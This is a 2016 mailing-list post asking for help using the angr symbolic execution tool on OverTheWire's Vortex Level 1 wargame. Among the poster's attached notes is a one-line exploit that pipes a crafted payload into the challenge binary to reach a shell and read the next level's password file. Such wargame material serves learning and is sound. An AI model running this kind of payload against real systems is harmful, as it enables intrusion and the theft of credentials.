[angr] Advice on Coping with Loops

Berne Campbell berne.campbell at gmail.com
Mon Sep 26 17:13:11 PDT 2016


After attending Defcon 24 I've become interested in Angr. As part of
learning how to use it I've tried to write a solution to OverTheWire's
Vortex Level 1, which I've already solved manually.


I've attached the challenge's source and binary, my attempt at solving it
(I've tried different things so the code is a bit all over the shop), and
my old notes on the solution.

My initial attempts would die do to Out of Memory (OOM) etc.

I tried constraining the first 256 characters to backslashes to try to
cheat a bit to give it a boost etc. but that still failed (it would need to
find 6 more characters).

I tried disabling lazy solves, so that it would be able to trim/collapse

I tried enabling veritesting etc.. I'm fairly new to SAT/SMT, etc. I tried
reading some of the literature etc. which is where I learnt of the
veriteting technique that might help. I found an angr example using the
older style explore, I couldn't find a pathgroup style example but I worked
it out from the API docs.

I'm not sure if with my first use I've just stumbled on some pathological
case where due to loops there' combinational explosion and it's hard or
more likely I just don't grok the tool and techniques enough to be able to
tune it correctly to work.

I'd appreciate some tips, or hints, or even a basic solution.

Also if you know of any users in Sydney Australia, I'd like host a  demo,
workshop, and/or talk at Ruxmon Sydney. I think the tool is really cool,
and I think this sort of thing is the future. Thanks for releasing it open
source and I hope to get better.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.cs.ucsb.edu/pipermail/angr/attachments/20160927/8f0c4a56/attachment.html>
-------------- next part --------------
## To input is ignore if we don't pad it out, if we pad it out we can get to teh shell, but if we pad with crap we'll get a bad command, so I padded with spaces.
## Alternative would be to set the ENV to a file and have the shell execute that file

vortex1 at melinda:/vortex$ python -c 'print "\\"*(256+4+1) + "\xca" + " "*4000 + "\n\ncat /etc/vortex_pass/vortex2\n\n"' | ./vo
vortex1 at melinda:/vortex$

-------------- next part --------------
A non-text attachment was scrubbed...
Name: solve.py
Type: text/x-python-script
Size: 5811 bytes
Desc: not available
URL: <https://lists.cs.ucsb.edu/pipermail/angr/attachments/20160927/8f0c4a56/attachment.bin>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: vortex1.c
Type: text/x-csrc
Size: 1008 bytes
Desc: not available
URL: <https://lists.cs.ucsb.edu/pipermail/angr/attachments/20160927/8f0c4a56/attachment-0001.bin>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: vortex1
Type: application/octet-stream
Size: 7559 bytes
Desc: not available
URL: <https://lists.cs.ucsb.edu/pipermail/angr/attachments/20160927/8f0c4a56/attachment.obj>

More information about the angr mailing list